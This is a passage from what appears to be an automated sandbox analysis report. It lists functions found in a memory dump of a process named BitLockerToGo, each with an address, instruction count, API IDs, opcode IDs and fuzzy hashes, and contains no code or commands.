                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                        • Opcode ID: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                                                                                                                        • Instruction ID: 9ec28875cd5e798081cc9b1fb1098287431769cc1de293d953d67822aa0ed750
                                                                                                                                                                                        • Opcode Fuzzy Hash: a77470943a9c02e9c65dbe29d206042e794c5106e232cfb958642423b576ca4d
                                                                                                                                                                                        • Instruction Fuzzy Hash: E231E3715083049FE310DF58C8C1B6BBBF4EB85314F14893EEA9897391D3799A488B6A
                                                                                                                                                                                        Function 00411333 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3861434553-0
                                                                                                                                                                                        • Opcode ID: b3c8206b3a344f2c1ee8a2422b50c34a25ddd076cd78358c1f5963fb30513c6f
                                                                                                                                                                                        • Instruction ID: eda1d74cf79647e098188c3e02d50c6276112426ba03b045f3060ce80e6538fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: b3c8206b3a344f2c1ee8a2422b50c34a25ddd076cd78358c1f5963fb30513c6f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 800149F69182409BD7006F35BC120FBB7E0EB8231DF14857EE646D21A1E7358821924A
                                                                                                                                                                                        Function 00408C9E Relevance: .8, Instructions: 815COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3cc0341b01a65ee5aa36ee29612d21f2a7bb69938064c905cc33e2943e9ef97e
                                                                                                                                                                                        • Instruction ID: a6b1b9560d85423246893116c1174cf4479b3d8257e7eae3421708c513230cd6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cc0341b01a65ee5aa36ee29612d21f2a7bb69938064c905cc33e2943e9ef97e
                                                                                                                                                                                        • Instruction Fuzzy Hash: C262AB39204601CFD724CF28D85075ABBF2FF89314F198A6DE88687B91DB35E991CB94
                                                                                                                                                                                        Function 0040BA80 Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                                                                                                                        • Instruction ID: 6038ecc6ab191d57e05e5c0b65a33849187978460077f5cd602bb7f9f81a3ed2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 97fb968541b031e80c3fe714d96f6fb09dfad10181e87cc40de9f467a72d3e72
                                                                                                                                                                                        • Instruction Fuzzy Hash: F542D431518315CBC724DF18E8806ABB3E1FFD4314F298A3ED995A7385D738A951CB8A
                                                                                                                                                                                        Function 0040AF70 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0f23c809b7ad94ef6d963860c3a560882cf5d5cfb3045ba22b9eea2afe0b9053
                                                                                                                                                                                        • Instruction ID: 299dae1369da0c63fb3fa98c40d65d1eed2793e4933cc098ca48bfc92a84e6de
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f23c809b7ad94ef6d963860c3a560882cf5d5cfb3045ba22b9eea2afe0b9053
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2528F70A087849FE7358B24C4847A7BBE1EB91314F14493EC5E616BC2C37DA989C79E
                                                                                                                                                                                        Function 00406DD0 Relevance: .7, Instructions: 657COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
                                                                                                                                                                                        • Instruction ID: 1ee736a5611647d8b78130716cf6bb99b554f5e988d4690ceead0be568bd5f1b
                                                                                                                                                                                        • Opcode Fuzzy Hash: a0fcbbd3b9e49f22bcd552b99b501a40e0b07a2d02f9984baf02521e964c93dc
                                                                                                                                                                                        • Instruction Fuzzy Hash: DA52C67190C3458FCB15CF14C0906AABBE1BF85314F158A7EF89A6B381D779E845CB86
                                                                                                                                                                                        Function 004077D0 Relevance: .6, Instructions: 620COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                                                                                                                        • Instruction ID: c51b75f3be66d6bc69e93bf52832389703b540c3940eaa209a253ba6dfcb9ec0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 285106c434c0234a52e7ab74c4b50f650ae19940123bbbc214f401134c44a373
                                                                                                                                                                                        • Instruction Fuzzy Hash: 42422770A19B108FC378CF29C680526BBF1BF45710B644A2ED69797B90D33AF845CB5A
                                                                                                                                                                                        Function 00440F74 Relevance: .5, Instructions: 516COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 56a0380109bff15c8a662aa4a51e52c7f36c3c99f583ea2fe8aab385adb03c81
                                                                                                                                                                                        • Instruction ID: 7b68b14efb9e5f56e547ccd32000ce0052bca4a54416f3351253771368d991f2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 56a0380109bff15c8a662aa4a51e52c7f36c3c99f583ea2fe8aab385adb03c81
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F02593AA08251CFD314CF38D88052AB7E2BF9A314F19867ED8A5CB392C735D945CB85
                                                                                                                                                                                        Function 00409EC0 Relevance: .5, Instructions: 459COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 4db18271eb386e032360dcf999485afc82d7768e156cbee262d35cb44fc198fa
                                                                                                                                                                                        • Instruction ID: 1f84b9a3162061c593fd0c3e161e0574d7c886250a1fb2e65be81cc49f32d8ef
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4db18271eb386e032360dcf999485afc82d7768e156cbee262d35cb44fc198fa
                                                                                                                                                                                        • Instruction Fuzzy Hash: F6F1BD752083418FC724CF29C88166BFBE2BFD9304F08892EE8C587791E679E955CB56
                                                                                                                                                                                        Function 0041CEB0 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f8fde823c580300c0ef171f46c76d45da08d793d845ae982e1411e0f769ff761
                                                                                                                                                                                        • Instruction ID: 292716b2bcd4d46a720f2fd9a3cf641061a25f22d225b3cd07599cd08486534d
                                                                                                                                                                                        • Opcode Fuzzy Hash: f8fde823c580300c0ef171f46c76d45da08d793d845ae982e1411e0f769ff761
                                                                                                                                                                                        • Instruction Fuzzy Hash: 77B126B5D00225DBCB24DF54CC926BBB3B1FF55324F18422AE8466B390F339A991C799
                                                                                                                                                                                        Function 0041D2F0 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 15d263959cdbd0676bb000bd9ba85f0b8c8cad5d7ec0edd05c4fe35998989944
                                                                                                                                                                                        • Instruction ID: a68e2a71d1c185585c8a5e2cdf375afac042f87a1c00044e47a30a7d8de5b346
                                                                                                                                                                                        • Opcode Fuzzy Hash: 15d263959cdbd0676bb000bd9ba85f0b8c8cad5d7ec0edd05c4fe35998989944
                                                                                                                                                                                        • Instruction Fuzzy Hash: 01E1C0B4909350CBE7309F24C891BAB77E0FF96314F044A2DE4899B391E7389845CB5A
                                                                                                                                                                                        Function 0042A2F3 Relevance: .4, Instructions: 411COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 1f96bb3b17923ba2f679100977dfa39e25e8a7e7638deceb5bea5cba49df1960
                                                                                                                                                                                        • Instruction ID: 6325d173a6809f82532a28191c8e78db49208ada23d459e51677d308ddf821e7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f96bb3b17923ba2f679100977dfa39e25e8a7e7638deceb5bea5cba49df1960
                                                                                                                                                                                        • Instruction Fuzzy Hash: BDC103756082518FC704CF24E88126BBBE1EFDA308F48497EE8C587342D239E916CB5B
                                                                                                                                                                                        Function 0042D416 Relevance: .4, Instructions: 384COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 0441e3f47ed21eaa86e09517fde3886f407fc818d5662733b32ac97f68ac860f
                                                                                                                                                                                        • Instruction ID: 0c7654cd71785253e5f44b845161add710c438a804403980f88b630fbe17140f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0441e3f47ed21eaa86e09517fde3886f407fc818d5662733b32ac97f68ac860f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 88C14875A08360CFD314CF28E88166BBBE2AFDA314F58492DF48587391D778C845CB9A
                                                                                                                                                                                        Function 0040AAB0 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 104ea06e439cf64efc7312fa3c449a3db2eab3576fea67794910c2127a13f837
                                                                                                                                                                                        • Instruction ID: 35cd0a3d13f726b4651a7338363163660ec2c8079ffffaafe5895e7622689e77
                                                                                                                                                                                        • Opcode Fuzzy Hash: 104ea06e439cf64efc7312fa3c449a3db2eab3576fea67794910c2127a13f837
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BC169B2A487418FC360CF68CC96BABB7E1FF85318F08492DD199D6242E778A155CB46
                                                                                                                                                                                        Function 00444120 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: a8660088937000bb7719c1285ceaf5f27317a447c447eb7fd0538a94b1dc15ea
                                                                                                                                                                                        • Instruction ID: 8a91c05dab5c944372060ca53320f10f284bdfbf31b558c7cbdf1dbb364fc373
                                                                                                                                                                                        • Opcode Fuzzy Hash: a8660088937000bb7719c1285ceaf5f27317a447c447eb7fd0538a94b1dc15ea
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C91CE35B083218BE724DF58C880B2BB3E2FBD9740F14856DE9859B355D775AC41CB86
                                                                                                                                                                                        Function 00443E20 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: 25f377866a2a1b8ac594bba077fc5bdc5c24ec0225c489d76b7fca57da9d174f
                                                                                                                                                                                        • Instruction ID: 6852220ee78f75a2d4d44c175798e87b395478fb0f4a1986d419effb27b6bd7f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 25f377866a2a1b8ac594bba077fc5bdc5c24ec0225c489d76b7fca57da9d174f
                                                                                                                                                                                        • Instruction Fuzzy Hash: DB81E2356083028BE715DF18C490B2BB7E2FF99710F14896EE9858B3A1EB35DC61CB46
                                                                                                                                                                                        Function 00433160 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f7068b3877bbd43e3ea4426833f4735d1647946ec6b424be7b25c3145e8328ed
                                                                                                                                                                                        • Instruction ID: ebea060812df9c440f8abf4cb82770294fc498a1ea8075b13ad90bb3a43bad39
                                                                                                                                                                                        • Opcode Fuzzy Hash: f7068b3877bbd43e3ea4426833f4735d1647946ec6b424be7b25c3145e8328ed
                                                                                                                                                                                        • Instruction Fuzzy Hash: EC815C33A195D047CB158E3C5C502ADAA935F9B331F3E93AAD9B19B3D1C52C8E038395
                                                                                                                                                                                        Function 00411436 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: f89bca1f235fffc17e6a408a57cd2602db94213003056dcd2cdf45d17a9a9d22
                                                                                                                                                                                        • Instruction ID: 64df405211a9b95f8d381ae5a98f793a7e216dc1a3f691e725eea92c926c389c
                                                                                                                                                                                        • Opcode Fuzzy Hash: f89bca1f235fffc17e6a408a57cd2602db94213003056dcd2cdf45d17a9a9d22
                                                                                                                                                                                        • Instruction Fuzzy Hash: 446156317146129FD7189B298D426F673D2E7D6301F2C883EEA82C7332D32CE8969719
                                                                                                                                                                                        Function 00443B80 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: bd7c89ef0e3afd4c2c30dd94db1d332a7aec04f83ff6cba012340266aaf75c52
                                                                                                                                                                                        • Instruction ID: 4dcd992d7de520fb6eb07513437e51d93530859e88be14ed96e50575c82ea5ec
                                                                                                                                                                                        • Opcode Fuzzy Hash: bd7c89ef0e3afd4c2c30dd94db1d332a7aec04f83ff6cba012340266aaf75c52
                                                                                                                                                                                        • Instruction Fuzzy Hash: 69710631A083019BE714EF18C851B3BB3E2EF95B51F19893DE8859B391DB389951C749
                                                                                                                                                                                        Function 0042CC9C Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 4c684507e89593254484bbf19e0f038db5a11cb92a0f6b781d89425728a5ade7
                                                                                                                                                                                        • Instruction ID: 15329c2cdc2addfc1820f306f771a7189f90b4c978d3834488c452e751b52ea4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c684507e89593254484bbf19e0f038db5a11cb92a0f6b781d89425728a5ade7
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A71FF746083208BC7148F25E89126BB7F2EFE6754F488A2DE4D55B391E3789902C78B
                                                                                                                                                                                        Function 00439EA0 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 3e09f0728429eec1b8915a1a9d172bec702d6f936df9ce8a048c4ed1834d8ec1
                                                                                                                                                                                        • Instruction ID: b18341775a1ec020f0a166b4c7a2b5565affad59213a7dd6b023bc7c1d7d2692
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e09f0728429eec1b8915a1a9d172bec702d6f936df9ce8a048c4ed1834d8ec1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9091077160C7418BD714DF3C894022BBBD29BCA324F298B2EE4E5973E6D679C845874B
                                                                                                                                                                                        Function 0042C5F0 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 76990fac503b4bfeae178dbdb162e7716ed69a155829da1cefcd6424eb856575
                                                                                                                                                                                        • Instruction ID: 5c1656a556ef2579ea079c2e71e44598901308f95b915a1ee4ba88947e51fdca
                                                                                                                                                                                        • Opcode Fuzzy Hash: 76990fac503b4bfeae178dbdb162e7716ed69a155829da1cefcd6424eb856575
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E61EE746083118BC3209F25D8A176BBBF1EFC2764F489A1DF4D59B391E3789901CB9A
                                                                                                                                                                                        Function 00416CC1 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                                                                                                                        • Instruction ID: a914b660a3e055a607b8e65222420a4c49ce7f67dede40f34d2522a3c32130e1
                                                                                                                                                                                        • Opcode Fuzzy Hash: e7f0886e71c51a037be77bbe803af3701101e01c18405af914baea81eaf70866
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D910A75604B808FC315CF38D8913A6BFE1AB9A314F19896DD5EBCB382D6399446CB11
                                                                                                                                                                                        Function 0040F74C Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: f5b243fae0f8bf373573fd802f5910826aefc1ca9b4f11e97f5fbbf5e5da4c4d
                                                                                                                                                                                        • Instruction ID: 3f230e4cf3a7490c865bdbb72609187ba07b0a6b9b1bfd8d2a1ed225939444b4
                                                                                                                                                                                        • Opcode Fuzzy Hash: f5b243fae0f8bf373573fd802f5910826aefc1ca9b4f11e97f5fbbf5e5da4c4d
                                                                                                                                                                                        • Instruction Fuzzy Hash: FA619C75604B00CFD7388F29D85176BB7E2BB99314F118A3DE4AB87AA1DB34E445CB48
                                                                                                                                                                                        Function 00432F30 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 2b7e592b0d436d608c9b239a6abb55383d2af380d285bccb39998747d97ea939
                                                                                                                                                                                        • Instruction ID: 12b84ae3bd7a4e9105d6ac6501488a4cd802b926778ab41861a4117e37cdb6aa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b7e592b0d436d608c9b239a6abb55383d2af380d285bccb39998747d97ea939
                                                                                                                                                                                        • Instruction Fuzzy Hash: 11513837A0959047DB189E3C5C112B9AA630BEB334F3E937BD8B59B3D5C52A8D03435A
                                                                                                                                                                                        Function 0042B799 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
